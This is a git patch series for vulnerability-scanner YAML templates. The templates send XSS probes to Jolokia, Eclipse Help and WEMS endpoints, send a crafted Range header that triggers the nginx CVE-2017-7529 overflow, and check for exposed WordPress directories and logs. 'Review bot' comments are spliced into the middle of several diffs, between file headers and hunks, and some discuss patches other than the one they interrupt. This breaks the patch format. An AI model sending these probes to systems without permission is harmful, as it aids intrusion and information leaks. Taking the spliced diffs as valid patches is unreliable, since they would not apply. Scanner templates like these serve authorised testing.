From 211309301424169f38f7585f61f5380b4d98242f Mon Sep 17 00:00:00 2001 From: flag007 <66717990+flag007@users.noreply.github.com> Date: Thu, 27 Aug 2020 20:27:47 +0800 Subject: [PATCH 01/36] Update CVE-2018-1000129.yaml There are two problems with this payload, / means the path, add it cannot be detected correctly, in addition, it should not be url-encoded
--- cves/CVE-2018-1000129.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index ebaf25b0e0..46ba8c2eec 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -18,5 +18,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
+ - ""
 part: body
From 10bc6dbef635ab759e739c630223c152cd3223b4 Mon Sep 17 00:00:00 2001 From: flag007 <66717990+flag007@users.noreply.github.com> Date: Thu, 27 Aug 2020 20:32:15 +0800 Subject: [PATCH 02/36] Update CVE-2018-1000129.yaml A single svg is prone to false positives, let me update the payload
--- cves/CVE-2018-1000129.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index 46ba8c2eec..c1a75edf2a 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -18,5 +18,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
+ - ""
 part: body
From d107dc26ad74d3a78a5a4dc85f8b7f60a8f98342 Mon Sep 17 00:00:00 2001 From: un-fmunozs Date: Sat, 29 Aug 2020 12:40:08 -0500 Subject: [PATCH 03/36] Update favicon-detection.yaml Add jira, gitlab and fixed wordpress hash
--- technologies/favicon-detection.yaml | 26 ++++++++++++++++++++------ 1 file changed, 20 insertions(+), 6 deletions(-)
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 29c18ba38f..28ec32ffa5 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -14,8 +14,10 @@ info:
 # 17542,e16377344d2d52a15e735041b3eb2c5a,jenkins
 # 1150,6d2adf39ca320265830403dfc030033a,liferay
 # 3638,59a0c7b6e4848ccdabcea0636efda02b,blogger
- # 198,59a0c7b6e4848ccdabcea0636efda02b,wordpress
- # 5430,59a0c7b6e4848ccdabcea0636efda02b,wordpress
+ # 5430,c291c057816f71ce15ba5c496f1a965a,wordpress
+ # 1611,f7e3d97f404e71d302b3239eef48d5f2,gitlab
+ # 6093,88717398db158e3330ce94fc1784e4a7,jira
+ # 2494,88717398db158e3330ce94fc1784e4a7,jira
 requests:
 - method: GET
@@ -61,11 +63,23 @@ requests:
 name: jenkins
 dsl:
 - "len(body)==17542 && status_code==200 && (\"23e8c7bd78e8cd826c5a6073b15068b1\" == md5(body))"
- - type: dsl
- name: wordpress
- dsl:
- - "len(body)==198 && status_code==200 && (\"c6acedaff906029fc5455d9ec52c7f42\" == md5(body))"
 - type: dsl
 name: wordpress
 dsl:
 - "len(body)==5430 && status_code==200 && (\"c291c057816f71ce15ba5c496f1a965a\" == md5(body))"
+ - type: dsl
+ name: gitlab
+ dsl:
+ - "len(body)==1611 && status_code==200 && (\"f7e3d97f404e71d302b3239eef48d5f2\" == md5(body))"
+ - type: dsl
+ name: jira
+ dsl:
+ - "len(body)==6093 && status_code==200 && (\"88717398db158e3330ce94fc1784e4a7\" == md5(body))"
+ - type: dsl
+ name: jira
+ dsl:
+ - "len(body)==2494 && status_code==200 && (\"04d89d5b7a290334f5ce37c7e8b6a349\" == md5(body))"
+ - type: dsl
+ name: confluence
+ dsl:
+ - "len(body)==4259 && status_code==200 && (\"966e60f8eb85b7ea43a7b0095f3e2336\" == md5(body))"
From 4f9de168afe56a48f9086f5c11d52159672345ed Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 09:57:07 +0530 Subject: [PATCH 04/36] drafting cve
--- cves/CVE-2017-7529.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/CVE-2017-7529.yaml
diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml
new file mode 100644
index 0000000000..6c5a7b9b16
--- /dev/null
+++ b/cves/CVE-2017-7529.yaml
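Review bot: The second `jira` matcher added in this hunk pins `len(body)==2494` to md5 `04d89d5b7a290334f5ce37c7e8b6a349`, but the comment table added in the previous hunk lists `# 2494,88717398db158e3330ce94fc1784e4a7,jira` — the same hash as the 6093-byte entry — so one of the two is wrong and the table no longer documents what the template actually matches. The new `confluence` matcher (4259 bytes, `966e60f8eb85b7ea43a7b0095f3e2336`) has no table entry at all. Please make the table match the matchers, e.g. `# 2494,04d89d5b7a290334f5ce37c7e8b6a349,jira` and `# 4259,966e60f8eb85b7ea43a7b0095f3e2336,confluence`, and add a one-line comment above the matcher list noting that a favicon hash is a fingerprint hint (icons are copied, themed and proxied), not a confirmed product identification.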
@@ -0,0 +1,29 @@
+id: CVE-2017-7529
+info:
+ author: "Harsh Bothra"
+ name: "Nginx Remote Integer Overflow"
+ severity: medium
+ description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
+
+# This template supports the detection part only.
+# Do not test any website without permission
+# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Range: bytes=-17208,-9223372036854758792
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 206
+ - type: word
+ words:
+ - Content-Range
+ part: header
From 3ff2f585c5f9e7e873f043be0edb06d7014210c1 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 10:02:59 +0530 Subject: [PATCH 05/36] Update CVE-2018-1000129.yaml
--- cves/CVE-2018-1000129.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index c1a75edf2a..c3c5808622 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -18,5 +18,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
+ - ""
 part: body
From a850c41aa1d15c7f601701fc3d597eca0aa4dc88 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 30 Aug 2020 11:58:14 +0700 Subject: [PATCH 06/36] :hammer: Add server matcher
--- cves/CVE-2017-7529.yaml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-)
diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml
index 6c5a7b9b16..fee2667d75 100644
--- a/cves/CVE-2017-7529.yaml
+++ b/cves/CVE-2017-7529.yaml
@@ -1,23 +1,23 @@
 id: CVE-2017-7529
 info:
- author: "Harsh Bothra"
+ author: "Harsh Bothra & @dwisiswant0"
 name: "Nginx Remote Integer Overflow"
 severity: medium
 description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
-# This template supports the detection part only.
-# Do not test any website without permission
-# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
+ # This template supports the detection part only.
+ # Do not test any website without permission
+ # https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
 requests:
 - raw:
 - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Range: bytes=-17208,-9223372036854758792
- Connection: close
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Range: bytes=-17208,-9223372036854758792
+ Connection: close
 matchers-condition: and
 matchers:
 - type: status
@@ -25,5 +25,6 @@ requests:
 - 206
 - type: word
 words:
- - Content-Range
+ - "Server: nginx"
+ - "Content-Range"
 part: header
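Review bot: The `Content-Range` word in the second hunk is still scoped to `part: header`, which likely inverts the check: the request sends two ranges, and a server that honours both answers with a `multipart/byteranges` body where each part carries its own `Content-Range` line, while a single top-level `Content-Range` header is what you get when only the valid first range is served — i.e. the patched behaviour. I would keep the 206/`Server: nginx` checks on the header and add a separate body matcher for the range marker, `- type: word` / `words: ["Content-Range"]` / `part: body`, and confirm against the referenced gist, which as far as I recall tests the response text rather than the headers. Note also that `Server: nginx` is matched as a literal string, so a reverse proxy that rewrites or strips `Server` hides a vulnerable backend; worth a comment such as `# Server header match will miss nginx behind a proxy that rewrites Server`.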
From f40edfcbb82b42578caa362fcd05159305ff68c0 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 30 Aug 2020 12:04:34 +0700 Subject: [PATCH 07/36] :hammer: Add 'and' condition
--- cves/CVE-2017-7529.yaml | 1 + 1 file changed, 1 insertion(+)
diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml
index fee2667d75..894cd713e1 100644
--- a/cves/CVE-2017-7529.yaml
+++ b/cves/CVE-2017-7529.yaml
@@ -27,4 +27,5 @@ requests:
 words:
 - "Server: nginx"
 - "Content-Range"
+ condition: and
 part: header
From 5a860c63edd56c011d6ac5a15efa6da75251d38e Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 10:35:28 +0530 Subject: [PATCH 08/36] Create eclipse-help-system-xss.yaml
--- vulnerabilities/eclipse-help-system-xss.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 vulnerabilities/eclipse-help-system-xss.yaml
diff --git a/vulnerabilities/eclipse-help-system-xss.yaml b/vulnerabilities/eclipse-help-system-xss.yaml
new file mode 100644
index 0000000000..9727dac10d
--- /dev/null
+++ b/vulnerabilities/eclipse-help-system-xss.yaml
@@ -0,0 +1,20 @@
+id: eclipse-help-system-xss
+
+info:
+ name: Eclipse Help System RXSS vulnerability
+ author: pikpikcu
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/help/index.jsp?view="
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - ""
+ part: body
From 01d055aa1fe4da728f550186ac01532fabd1398d Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 10:38:28 +0530 Subject: [PATCH 09/36] Update eclipse-help-system-xss.yaml
--- vulnerabilities/eclipse-help-system-xss.yaml | 2 ++ 1 file changed, 2 insertions(+)
diff --git a/vulnerabilities/eclipse-help-system-xss.yaml b/vulnerabilities/eclipse-help-system-xss.yaml
index 9727dac10d..5e7420ea46 100644
--- a/vulnerabilities/eclipse-help-system-xss.yaml
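Review bot: The Eclipse Help template in the second hunk reports a reflected XSS on any 200 whose body echoes the `view=` payload, with no check on how the response is served; a reflection into a JSON or plain-text response is not exploitable, so this will over-report. Add a header matcher next to the body word, `- type: word` / `part: header` / `words: ["text/html"]`, so the `and` condition also requires an HTML content type. The `info` block also lacks a `description` and a reference; a one-line description of which Eclipse Help System component and parameter is affected would let a reader triage the finding without opening the template.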
+++ b/vulnerabilities/eclipse-help-system-xss.yaml
@@ -5,6 +5,8 @@ info:
 author: pikpikcu
 severity: medium
+ # Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml
+
 requests:
 - method: GET
 path:
From 140716bac8a0f8a774a9c4e831d634353ac69f49 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 11:10:09 +0530 Subject: [PATCH 10/36] Create wems-manager-xss.yaml
--- vulnerabilities/wems-manager-xss.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/wems-manager-xss.yaml
diff --git a/vulnerabilities/wems-manager-xss.yaml b/vulnerabilities/wems-manager-xss.yaml
new file mode 100644
index 0000000000..a5e89859d3
--- /dev/null
+++ b/vulnerabilities/wems-manager-xss.yaml
@@ -0,0 +1,24 @@
+id: wems-manager-xss
+
+info:
+ name: WEMS Enterprise Manager XSS
+ author: pikpikcu
+ severity: medium
+
+ # Source
+ # https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
+ # https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/wems-enterprise-xss.yaml
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/guest/users/forgotten?email=">'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - '">'
+ part: body
From cd35c5db351307cdd82850df6186d3840721c99d Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 13:34:09 +0530 Subject: [PATCH 11/36] Update README.md
--- README.md | 33 +++++++++++++++++++++++++++------ 1 file changed, 27 insertions(+), 6 deletions(-)
diff --git a/README.md b/README.md
index d21217d3f5..bfaf4ef1f7 100644
--- a/README.md
+++ b/README.md
@@ -12,10 +12,10 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n Template Directory ``` -├── LICENSE.md -├── README.md ├── cves │   ├── CVE-2017-10075.yaml +│   ├── CVE-2017-14849.yaml +│   ├── CVE-2017-5638.yaml │   ├── CVE-2017-7529.yaml │   ├── CVE-2017-9506.yaml │   ├── CVE-2017-9841.yaml @@ -37,7 +37,9 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2018-5230.yaml │   ├── CVE-2018-7490.yaml │   ├── CVE-2019-10475.yaml +│   ├── CVE-2019-11248.yaml │   ├── CVE-2019-11510.yaml +│   ├── CVE-2019-11580.yaml │   ├── CVE-2019-12314.yaml │   ├── CVE-2019-14322.yaml │   ├── CVE-2019-14974.yaml @@ -51,9 +53,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2019-19908.yaml │   ├── CVE-2019-19985.yaml │   ├── CVE-2019-2588.yaml +│   ├── CVE-2019-2725.yaml │   ├── CVE-2019-3396.yaml │   ├── CVE-2019-3799.yaml │   ├── CVE-2019-5418.yaml +│   ├── CVE-2019-6112.yaml │   ├── CVE-2019-7609.yaml │   ├── CVE-2019-8449.yaml │   ├── CVE-2019-8451.yaml @@ -66,6 +70,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2020-12720.yaml │   ├── CVE-2020-13167.yaml │   ├── CVE-2020-13379.yaml +│   ├── CVE-2020-17505.yaml +│   ├── CVE-2020-17506.yaml │   ├── CVE-2020-2096.yaml │   ├── CVE-2020-3187.yaml │   ├── CVE-2020-3452.yaml @@ -78,12 +84,14 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2020-7961.yaml │   ├── CVE-2020-8091.yaml │   ├── CVE-2020-8115.yaml +│   ├── CVE-2020-8163.yaml │   ├── CVE-2020-8191.yaml │   ├── CVE-2020-8193.yaml │   ├── CVE-2020-8194.yaml │   ├── CVE-2020-8512.yaml │   ├── CVE-2020-8982.yaml │   ├── CVE-2020-9484.yaml +│   ├── CVE-2020-9496.yaml │   └── CVE-2020-9757.yaml ├── default-credentials │   ├── grafana-default-credential.yaml 
@@ -97,10 +105,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n ├── files │   ├── apc-info.yaml │   ├── cgi-test-page.yaml -│   ├── debug-pprof.yaml │   ├── dir-listing.yaml │   ├── docker-registry.yaml +│   ├── druid-monitor.yaml │   ├── drupal-install.yaml +│   ├── ds_store.yaml │   ├── elasticsearch.yaml │   ├── exposed-kibana.yaml │   ├── exposed-svn.yaml @@ -144,6 +153,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── kubernetes-pods.yaml │   ├── mongo-express-web-gui.yaml │   ├── parallels-html-client.yaml +│   ├── pfsense-web-gui.yaml │   ├── phpmyadmin-panel.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml @@ -153,8 +163,10 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── supervpn-panel.yaml │   ├── swagger-panel.yaml │   ├── tikiwiki-cms.yaml +│   ├── traefik-dashboard │   ├── weave-scope-dashboard-detect.yaml -│   └── webeditors.yaml +│   ├── webeditors.yaml +│   └── workspaceone-uem-airWatch-dashboard-detect.yaml ├── payloads │   └── CVE-2020-6287.xml ├── security-misconfiguration @@ -166,6 +178,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── jira-unauthenticated-popular-filters.yaml │   ├── jira-unauthenticated-projects.yaml │   ├── jira-unauthenticated-user-picker.yaml +│   ├── missing-x-frame-options.yaml +│   ├── put-method-enabled.yaml │   ├── rack-mini-profiler.yaml │   ├── springboot-detect.yaml │   ├── wamp-xdebug-detect.yaml 
@@ -174,10 +188,12 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── detect-all-takeovers.yaml │   └── s3-subtakeover.yaml ├── technologies +│   ├── artica-web-proxy-detect.yaml │   ├── bigip-config-utility-detect.yaml │   ├── citrix-vpn-detect.yaml │   ├── clockwork-php-page.yaml │   ├── couchdb-detect.yaml +│   ├── favicon-detection.yaml │   ├── github-enterprise-detect.yaml │   ├── gitlab-detect.yaml │   ├── graphql.yaml @@ -188,7 +204,6 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── linkerd-badrule-detect.yaml │   ├── linkerd-ssrf-detect.yaml │   ├── netsweeper-webadmin-detect.yaml -│   ├── ntlm-directories.yaml │   ├── prometheus-exposed-panel.yaml │   ├── s3-detect.yaml │   ├── sap-netweaver-as-java-detect.yaml @@ -200,6 +215,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n ├── tokens │   ├── amazon-mws-auth-token-value.yaml │   ├── aws-access-key-value.yaml +│   ├── credentials-disclosure.yaml │   ├── google-api-key.yaml │   ├── http-username-password.yaml │   ├── mailchimp-api-key.yaml @@ -209,6 +225,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── couchdb-adminparty.yaml │   ├── crlf-injection.yaml │   ├── discourse-xss.yaml +│   ├── eclipse-help-system-xss.yaml │   ├── git-config-nginxoffbyslash.yaml │   ├── ibm-infoprint-directory-traversal.yaml │   ├── microstrategy-ssrf.yaml 
@@ -220,16 +237,20 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── pdf-signer-ssti-to-rce.yaml │   ├── rce-shellshock-user-agent.yaml │   ├── rce-via-java-deserialization.yaml +│   ├── sick-beard-xss.yaml │   ├── springboot-actuators-jolokia-xxe.yaml │   ├── symfony-debugmode.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml +│   ├── wems-manager-xss.yaml │   ├── wordpress-duplicator-path-traversal.yaml │   ├── wordpress-wordfence-xss.yaml │   └── x-forwarded-host-injection.yaml └── workflows + ├── artica-web-proxy-workflow.yaml ├── bigip-pwner-workflow.yaml + ├── cisco-asa-workflow.yaml ├── grafana-workflow.yaml ├── jira-exploitaiton-workflow.yaml ├── liferay-rce-workflow.yaml @@ -243,7 +264,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n -13 directories, **214 templates**. +13 directories, **235 templates**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From f4f36ec0c6f420d798e0d2816c3d45567cdfe999 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 18:49:02 +0530 Subject: [PATCH 12/36] Update CVE-2018-1000129.yaml --- cves/CVE-2018-1000129.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml index b51c65fc8b..3d28d874ee 100644 --- a/cves/CVE-2018-1000129.yaml +++ b/cves/CVE-2018-1000129.yaml 
@@ -9,9 +9,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -19,5 +19,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
- part: body
+ - ""
+ part: body
\ No newline at end of file
From ad6897e9c2c7c2f180bbda774c4af53299ccf6f0 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 12:03:04 -0300 Subject: [PATCH 13/36] Update wordpress-directory-listing.yaml Add other paths susceptible to directory listing.
--- files/wordpress-directory-listing.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/files/wordpress-directory-listing.yaml b/files/wordpress-directory-listing.yaml
index dab4a9ddf1..fde2f1cc21 100644
--- a/files/wordpress-directory-listing.yaml
+++ b/files/wordpress-directory-listing.yaml
@@ -9,6 +9,10 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/wp-content/uploads/"
+ - "{{BaseURL}}/wp-content/themes/"
+ - "{{BaseURL}}/wp-content/plugins/"
+ - "{{BaseURL}}/wp-content/plugins/hustle/views/admin/dashboard/"
+ - "{{BaseURL}}/wp-includes/"
 matchers-condition: and
 matchers:
 - type: status
@@ -16,4 +20,4 @@ requests:
 - 200
 - type: word
 words:
- - Index of /wp-content/uploads
+ - Index of /
From 841c47d7f6a1444ef1a409c302e15e89acc9c817 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 20:38:55 +0530 Subject: [PATCH 14/36] Update wordpress-directory-listing.yaml
--- files/wordpress-directory-listing.yaml | 1 - 1 file changed, 1 deletion(-)
diff --git a/files/wordpress-directory-listing.yaml b/files/wordpress-directory-listing.yaml
index fde2f1cc21..07eb4bbc09 100644
--- a/files/wordpress-directory-listing.yaml
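Review bot: The third path in the first hunk of the CVE-2018-1000129 template appends `:8080` to `{{BaseURL}}`, which produces a malformed target whenever the input URL already carries a port or a path (`https://host:8443:8080/jolokia/...`); either drop the hard-coded port and let the operator pass alternate ports, or build that request from `{{Hostname}}` instead. Separately, the body matcher only requires that the payload is echoed with a 200, while the vulnerability is specifically that `mimeType=text/html` makes Jolokia serve the reflection as HTML — add `- type: word` / `part: header` / `words: ["text/html"]` under the existing `and` condition so a JSON or plain-text echo is not reported. This is the fourth edit of the same three lines in this series; a `description` and a reference in `info` would save the next contributor re-deriving why the payload is not URL-encoded.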
+++ b/files/wordpress-directory-listing.yaml
@@ -11,7 +11,6 @@ requests:
 - "{{BaseURL}}/wp-content/uploads/"
 - "{{BaseURL}}/wp-content/themes/"
 - "{{BaseURL}}/wp-content/plugins/"
- - "{{BaseURL}}/wp-content/plugins/hustle/views/admin/dashboard/"
 - "{{BaseURL}}/wp-includes/"
 matchers-condition: and
 matchers:
From f7e807b0248853dc479f032225ff463ab93eb292 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 12:41:22 -0300 Subject: [PATCH 15/36] Create wordpress-debug-log.yaml
--- files/wordpress-debug-log.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 files/wordpress-debug-log.yaml
diff --git a/files/wordpress-debug-log.yaml b/files/wordpress-debug-log.yaml
new file mode 100644
index 0000000000..4e31422043
--- /dev/null
+++ b/files/wordpress-debug-log.yaml
@@ -0,0 +1,22 @@
+id: wp-debug-log
+
+info:
+ name: WordPress debug log
+ author: geraldino2
+ severity: info
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/debug.log"
+ matchers:
+ - type: word
+ words:
+ - octet-stream
+ - text/plain
+ part: header
+ condition: or
+
+ - type: status
+ status:
+ - 200
From 800a3a7db5507a7470bcb1dc8719e3db71505fa3 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 12:42:58 -0300 Subject: [PATCH 16/36] Update wordpress-workflow.yaml
--- workflows/wordpress-workflow.yaml | 2 ++ 1 file changed, 2 insertions(+)
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 3b89e82520..5a3f683fd4 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -11,6 +11,7 @@ variables:
 wordpress_duplicator_path_traversal: vulnerabilities/wordpress-duplicator-path-traversal.yaml
 wordpress_wordfence_xss: vulnerabilities/wordpress-wordfence-xss.yaml
 wordpress_cve_1: cves/CVE-2019-9978.yaml
+ wordpress_debug_log: files/wordpress-debug-log.yaml
 logic: |
 wordpress_tech()
@@ -23,4 +24,5 @@ logic: |
 wordpress_duplicator_path_traversal()
 wordpress_wordfence_xss()
 wordpress_cve_1()
+ wordpress_debug_log()
 }
From 6357461ef332ddf9eb0e86fec7af6de964c6c21c Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 21:27:24 +0530 Subject: [PATCH 17/36] Update wordpress-debug-log.yaml
--- files/wordpress-debug-log.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/files/wordpress-debug-log.yaml b/files/wordpress-debug-log.yaml
index 4e31422043..afa317a2ff 100644
--- a/files/wordpress-debug-log.yaml
+++ b/files/wordpress-debug-log.yaml
@@ -9,6 +9,8 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/wp-content/debug.log"
+
+ matchers-condition: and
 matchers:
 - type: word
 words:
@@ -16,7 +18,7 @@ requests:
 - text/plain
 part: header
 condition: or
-
+
 - type: status
 status:
- - 200
+ - 200
\ No newline at end of file
From 6e0a78c4ac9b56cc54b1b75a0cc9e54f3a43970e Mon Sep 17 00:00:00 2001 From: Oways Date: Sun, 30 Aug 2020 19:04:30 +0300 Subject: [PATCH 18/36] Create drupal-user-enum-redirect.yaml
--- .../drupal-user-enum-redirect.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/drupal-user-enum-redirect.yaml
diff --git a/vulnerabilities/drupal-user-enum-redirect.yaml b/vulnerabilities/drupal-user-enum-redirect.yaml
new file mode 100644
index 0000000000..beb97c91b5
--- /dev/null
+++ b/vulnerabilities/drupal-user-enum-redirect.yaml
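Review bot: With `matchers-condition: and` now added, the debug-log template still fires on any 200 whose content type mentions `text/plain` or `octet-stream` at `/wp-content/debug.log`, which a soft-404 served as text, a WAF block page, or an unrelated download would satisfy; there is no evidence in the response that it is a PHP log. Add a body matcher on the log-line prefixes WordPress/PHP normally write, e.g. `- type: word` / `part: body` / `words: ["PHP Notice", "PHP Warning", "PHP Fatal error"]` with `condition: or`, so the `and` condition requires actual log content. `severity: info` may also understate the finding — debug.log often leaks absolute filesystem paths and plugin internals — so a short `description` stating what is exposed would help triage.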
